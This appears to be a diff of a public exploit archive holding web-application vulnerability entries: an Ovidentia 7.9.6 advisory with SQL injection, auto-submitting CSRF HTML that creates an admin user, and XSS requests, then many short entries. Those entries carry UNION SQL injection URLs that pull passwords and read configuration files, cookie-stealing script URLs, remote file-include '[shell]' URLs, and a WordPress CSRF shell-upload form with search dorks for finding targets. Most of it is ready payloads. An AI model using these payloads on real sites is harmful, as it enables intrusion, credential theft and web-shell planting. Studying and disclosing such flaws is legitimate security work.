[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities
[~] Author: sajith
[~] version: Ovidentia 7.9.6
[~]Vendor Homepage: http://www.ovidentia.org/
[~] vulnerable app link:http://www.ovidentia.org/telecharger
###########################################################
[1]SQL injection vulnerability
Log into admin panel and access delegate functionality > managing
administrators where &id parameter (shown below link) is vulnerable to sql
injection
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1
POC by sajith shetty:
request:
GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=
response:
style="cursor: pointer"
onclick="s=document.getElementById('babParam_1_5_0');
s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div
style="display: none; background-color: #EEEECC"
id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)
<i>called at</i>
[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute
query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>
<p><b>Database Error: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ''' at line 1</b></p>
<p>This script cannot continue, terminating.
[2]CSRF vulnerability
log into the admin portal and access the create user functionality
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=
using csrf vulnerability it was possible to add new user.
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php"
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="user[sendpwd]" value="0" />
<input type="hidden" name="user[password1]" value="P@ssw0rd1" />
<input type="hidden" name="user[notifyuser]" value="0" />
<input type="hidden" name="grp" value="" />
<input type="hidden" name="idx" value="Create" />
<input type="hidden" name="user[password2]" value="P@ssw0rd1" />
<input type="hidden" name="user[givenname]" value="POC" />
<input type="hidden" name="pos" value="A" />
<input type="hidden" name="widget_filepicker_job_uid[]"
value="52a35b7fac6c9" />
<input type="hidden" name="user[email]" value="poctester@xyz.com" />
<input type="hidden" name="user[nickname]" value="1234" />
<input type="hidden" name="user[sn]" value="test" />
<input type="hidden" name="tg" value="users" />
<input type="hidden" name="user[mn]" value="tester" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
[3]Reflected XSS
http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x
onerror=prompt(1);>
request:
GET
/cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
response:
<div id="ovidentia_headbottomright">
<div>
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :
http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x
onerror=prompt(1);>" title="Home"><img
src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"
/></a> 
<!-- Script OVML: show the list of the buttons of quick accesses to
functions by leaning on entries available in user section -->
[4]Stored xss
log into the admin portal and access mail functionlity and create new
domain using link below
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
here Name & Description field is vulnerable to stored XSS .payload:"><img
src=x onerror=prompt(1);>
request:
POST /cms/ovidentia-7-9-6/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen
response:
<td>Registrierte User</td>
</tr>
<tr class="BabSiteAdminFontBackground">
<td>
<a href="
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img
src=x onerror=prompt(111);></a>
</td>
<td>"><img src=x onerror=prompt(222);></td>
<td>Registrierte User</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</div>

48
platforms/php/webapps/30108.txt Executable file
View file

@ -0,0 +1,48 @@
#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 08/12/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/wordpress-themes-store/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
CSRF File Upload Vulnerability
Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
">
<br>
</br>
<input name="uploadfile[]" type="file" />
<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>
File Access :
http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php
Note :
Script CSRF equate with dork you use
########################################
#Greetz : SANJUNGAN JIWA , Exploit - DB , 1337 Day
#Thanks : Akira | Xie Log | - SANJUNGAN JIWA
########################################

9
platforms/php/webapps/30109.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24236/info
Particle Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Particle Gallery 1.0.1 and prior versions.
http://www.example.com/apppath/search.php?user=admin&order=>"><ScRiPt%20%0a%0d>alert(1111110)%3B</ScRiPt>

10
platforms/php/webapps/30111.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24249/info
myBloggie is prone to an SQL-injection vulnerability.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
This issue affects myBloggie 2.1.6 and earlier.
http://www.example.com/apppath/index.php?mode=viewuser&cat_id='
http://www.example.com/apppath/index.php?mode=viewuser&month_no=4&year="

10
platforms/php/webapps/30112.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/*
Read database credentials:
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F6E66696
775726174696F6E732F5048504A4B5F436F6E6669672E706870),4,5,6/**/from/**/Accounts/*

7
platforms/php/webapps/30113.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/*

7
platforms/php/webapps/30114.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/UserArea/Authenticate.php?sUName=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

7
platforms/php/webapps/30115.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

11
platforms/php/webapps/30116.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iDBLoc=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iTtlNumItems=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?&iNumPerPage=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?sSort=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

10
platforms/php/webapps/30118.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/gestion/index.php?path_inc=[shell]

9
platforms/php/webapps/30119.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/identification.php?path_inc=[shell]

9
platforms/php/webapps/30120.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/disconnect.php?path_inc=[shell]

9
platforms/php/webapps/30121.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/loginliste.php?path_inc=[shell]

9
platforms/php/webapps/30122.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/loginmodif.php?path_inc=[shell]

9
platforms/php/webapps/30123.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script//ident/index.php?path_inc=[shell]

9
platforms/php/webapps/30124.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/ident.inc.php?path_inc=[shell]

9
platforms/php/webapps/30125.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/menu/menuprincipal.php?path_inc=[shell]

9
platforms/php/webapps/30126.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/param/param.inc.php?path_inc=[shell]

9
platforms/php/webapps/30127.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/plugins/phpgacl/admin/index.php?path_inc=[shell]

9
platforms/php/webapps/30128.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/index.php?path_inc=[shell]

9
platforms/php/webapps/30129.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/common.inc.php?path_inc=[shell]

9
platforms/php/webapps/30131.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24269/info
Buttercup WFM (Web File Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue is reported to affect the Buttercup WFM - May 2007 edition. Other versions could also be affected.
http://www.example.com/index.php?title=%3Cscript%3Ealert(1)%3C/script%3E

7
platforms/php/webapps/30132.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24270/info
Evenzia CMS is prone to a cross-site script vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/includes/send.inc.php/>'>><script>alert(document.cookie)</script>

9
platforms/php/webapps/30133.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/chat.php?sid=<script>alert(123);</script>

9
platforms/php/webapps/30134.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> http://www.example.com/phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script>

9
platforms/php/webapps/30135.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/admin/header.php?admin[name]=<script>alert(123);</script>

Some files were not shown because too many files have changed in this diff Show more